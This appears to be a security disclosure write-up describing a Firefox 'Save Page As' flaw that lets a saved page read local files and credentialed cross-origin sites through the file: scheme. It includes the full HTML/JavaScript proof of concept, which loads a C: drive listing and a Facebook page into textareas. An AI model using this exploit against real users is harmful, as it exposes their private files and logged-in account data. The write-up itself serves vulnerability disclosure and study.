FireFox Local File Disclosure and Same Origin Policy bypass


It's possible to read external websites and any file on a victims computer using the 'Save Page As' functionality on Firefox.
This is reliant on Firefox's allowance of reading files in the same directory in the file: URI scheme. Which was deemed 'by design'.
You can do this with Google Chrome but you can't read the saved files, so Google did not consider this a bug.

The PoC

The following is the original PoC reported:

<html>
<head>
    <title>POC</title>
    <link rel="stylesheet" href="file:///C://" />
    <link rel="stylesheet" href="https://www.facebook.com/" />
</head>
<body>
    <textarea style="width: 434px; height: 310px;" id="facebook"></textarea>
    <textarea style="width: 434px; height: 310px;" id="files"></textarea>
    <script type="application/javascript">
        var doQ = (q) => { //Simple XMLHttpRequest
            try {
                var oReq = new XMLHttpRequest();
                oReq.addEventListener("load", function(e) {
                    console.dir(e)
                });
                oReq.open("GET", q, false);
                oReq.send();
            } catch (e) {
                alert('File not found or restricted.')
            };
            return oReq.response;
        };
        if (location.protocol == 'file:') {
            facebook.value = doQ('./POC_files/a.htm');
            files.value = doQ('./POC_files/a');
        } else {
            alert('Please hit CTRL+S and save this page first then open it locally.');
        }
    </script>
</body>
</html>


Basically, when there is a reference to any website or local file using something like a link tag, initially Firefox blocks these, however, when a user saves the webpage, the 'Save webpage as' part does not do any checks on whether the files being downloaded are legitimate.
After the files are downloaded, the folder they are in are predictable (same as title + _files) and so we are able to read a victims local files and external websites with full credentials.

Result Screenshot